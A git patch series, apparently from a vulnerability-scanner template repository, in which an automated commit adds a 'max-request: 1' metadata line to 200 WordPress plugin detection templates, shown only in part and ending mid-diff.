+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7184,7 +7185,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:28ebca963ae717c156d0adbbcac57a2c0266b9c4
+templates-checksum.txt:b768fe595ef4ee6df797943aaa03a8cfd1cec5a2
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From feac517592fe0815291394f271b105aba82f25cd Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 20 Sep 2023 06:54:40 +0000
Subject: [PATCH 0464/1090] TemplateMan Update [Wed Sep 20 06:54:40 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
